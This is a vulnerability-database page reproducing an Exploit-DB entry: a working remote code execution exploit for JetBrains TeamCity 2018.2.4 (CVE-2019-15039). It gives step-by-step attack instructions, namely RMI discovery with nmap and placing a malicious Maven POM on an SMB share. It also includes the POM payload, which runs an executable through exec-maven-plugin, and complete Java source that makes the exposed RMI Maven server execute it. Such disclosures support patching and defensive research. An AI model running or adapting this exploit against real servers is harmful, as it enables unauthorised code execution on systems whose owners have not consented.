Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

JetBrains TeamCity 2018.2.4 - Remote Code Execution

🗓️ 08 Jan 2020 00:00:00Reported by hantwisterType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 185 Views

JetBrains TeamCity 2018.2.4 - Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		JetBrains TeamCity 2018.2.4 - Remote Code Execution Exploit
8 Jan 202000:00
zdt
Circl		CVE-2019-15039
8 Jan 202000:00
circl
CNVD		JetBrains TeamCity Input Validation Error Vulnerability
5 Nov 201900:00
cnvd
CVE		CVE-2019-15039
1 Oct 201913:20
cve
Cvelist		CVE-2019-15039
1 Oct 201913:20
cvelist
EUVD		EUVD-2019-6126
7 Oct 202500:30
euvd
exploitpack		JetBrains TeamCity 2018.2.4 - Remote Code Execution
8 Jan 202000:00
exploitpack
Jetbrains		JetBrains Security Bulletin Q2 2019
26 Sep 201900:00
jetbrains
NVD		CVE-2019-15039
1 Oct 201914:15
nvd
Packet Storm		JetBrains TeamCity 2018.2.4 Remote Code Execution
8 Jan 202000:00
packetstorm
Rows per page
# Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution
# Date: 2020-01-07
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.jetbrains.com/
# Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads
# Version: 2018.2.4 for Windows
# CVE: CVE-2019-15039

# You'll need a few .jars from a copy of TeamCity to compile and run this code
# To compile, file path should match ${package}/${class}.java, e.g.,
# com/whatdidibreak/teamcity_expl/Main.java

# Instructions for Windows (easier case):

# 1) Verify exploitability.
#    1a) Verify the remote host is running Windows, e.g. checking for common
#        running services and their versions.
#    1b) Discover Java RMI services on the remote host, e.g. doing a 65k port
#        scan using nmap and the rmi-dumpregistry script. On one port, there
#        should be a registry with an object named teamcity-mavenServer. This
#        object should point to a second open port that is also identified as
#        Java RMI.

# 2) Prepare the payload.
#    2a) There needs to be an SMB share that the TeamCity software can read from
#        and that you can write to. You might establish a share on your own
#        system and make it accessible to anonymous users. Alternatively, if the
#        TeamCity server is domain-joined, you might find a pre-existing share
#        elsewhere in the domain.
#    2b) Place a malicious POM in that share, e.g.

<project>
	<modelVersion>4.0.0</modelVersion>
	<groupId>com.mycompany.app</groupId>
	<artifactId>my-module</artifactId>
	<version>1</version>
	<build>
		<plugins>
			<plugin>  
				<groupId>org.codehaus.mojo</groupId> 
				<artifactId>exec-maven-plugin</artifactId> 
				<version>1.1.1</version> 
				<executions>
					<execution>
						<goals>
							<goal>exec</goal> 
						</goals>
					</execution>
				</executions>
				<configuration>
					<executable>calc</executable>
					<arguments>
						<argument>-testarg</argument>
					</arguments>
				</configuration>
			</plugin>
		</plugins>
	</build>
</project>

# 3) Run this exploit.
#    Argument #1: TeamCity host (IP or FQDN)
#    Argument #2: Port of RMI Registry (the first open port described above)
#    Argument #3: UNC path to the malicious POM file (e.g., \\ip\share\pom.xml)
#    Argument #4: POM goal (e.g., exec:exec)

# NOTE: It is possible to exploit this issue in other situations, e.g. if the
# TeamCity server is running on a *nix system that allows access to some local
# directory over NFS.

 */
package com.whatdidibreak.teamcity_expl;

import java.io.File;
import java.io.IOException;

import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMISocketFactory;

import java.util.ArrayList;
import java.util.List;

import jetbrains.buildServer.maven.remote.MavenServer;
import jetbrains.buildServer.maven.remote.RemoteEmbedder;
import org.jetbrains.maven.embedder.MavenEmbedderSettings;
import org.jetbrains.maven.embedder.MavenExecutionResult;

public class Main {

    public static void main(String[] args) throws Throwable {
        String host = args[0];
        int port = Integer.parseInt(args[1]);
        String pomPath = args[2];
        String goal = args[3];

        // The exported object may point to a different host than what we're
        // using to connect to the registry, which could break things, i.e.,
        // - localhost
        // - for a multi-homed target, an IP we can't connect to
        // - a FQDN or hostname we can't resolve
        // - etc.
        // For this reason, we'll set up a socket factory that forces all
        // connections to go to the host specified by the user, ignoring the
        // host pointed to by the exported object.
        OverrideHostSocketFactory sf = new OverrideHostSocketFactory(host);
        RMISocketFactory.setSocketFactory(sf);

        // The rest of the code in this method should look fairly typical for
        // interacting with remote objects using RMI.
        Registry r = LocateRegistry.getRegistry(host, port, sf);

        MavenServer ms = (MavenServer) r.lookup("teamcity-mavenServer");

        MavenEmbedderSettings mes = new MavenEmbedderSettings();
        RemoteEmbedder re = ms.exportEmbedder(mes);

        File f = new File(pomPath);
        List ap = new ArrayList();
        List g = new ArrayList();
        g.add(goal);
        MavenExecutionResult mer = re.execute(f, ap, g);
    }

    private static class OverrideHostSocketFactory extends RMISocketFactory {

        private String targetHost;

        public OverrideHostSocketFactory(String targetHost) {
            this.targetHost = targetHost;
        }

        @Override
        public Socket createSocket(String host, int port) throws IOException {
            Socket toReturn = new Socket();
            toReturn.connect(new InetSocketAddress(targetHost, port));
            return toReturn;
        }

        @Override
        public ServerSocket createServerSocket(int port) throws IOException {
            throw new UnsupportedOperationException("Not supported yet.");
        }
    }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2020 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 26.8
CVSS 3.19.8
EPSS0.00229
remote code executionjetbrains teamcityexploitharrison nealvendorjava rmiwindowsvulnerabilitycve-2019-15039smb sharepommaliciousexploitabilityregistryipfqdnpayloadunc pathmaven serverrmisocketfactorysocket factory
185